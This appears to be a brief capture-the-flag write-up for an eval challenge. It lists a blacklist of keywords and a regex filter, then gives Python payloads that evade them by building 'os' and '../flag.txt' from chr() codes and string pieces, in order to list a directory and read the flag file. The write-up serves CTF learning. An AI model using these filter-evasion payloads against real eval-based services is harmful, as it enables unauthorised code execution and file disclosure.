3v@l¶
Blacklisted words: os,eval,exec,bind,connect,python,socket,ls,cat,shell,bind
Regex to bypass: r'0x[0-9A-Fa-f]+|\u[0-9A-Fa-f]{4}|%[0-9A-Fa-f]{2}|.[A-Za-z0-9]{1,3}\b|[\\/]|..'
0x[0-9A-Fa-f]+
: Hexadecimal numbers prefixed with 0x\\u[0-9A-Fa-f]{4}
: Unicode escape sequences in the \uXXXX format%[0-9A-Fa-f]{2}
: URL-encoded characters in the %XX format\.[A-Za-z0-9]{1,3}\b
: File extensions of 1 to 3 alphanumeric characters preceded by a dot[\\\/]
: Backslash or forward slash\.\.
: ..
__import__(chr(111)+chr(115)).listdir('.'+'.')
# os.listdir('..')
open('.'+'.'+chr(47)+'flag.'+'txt').read()
# open(../flag.txt).read()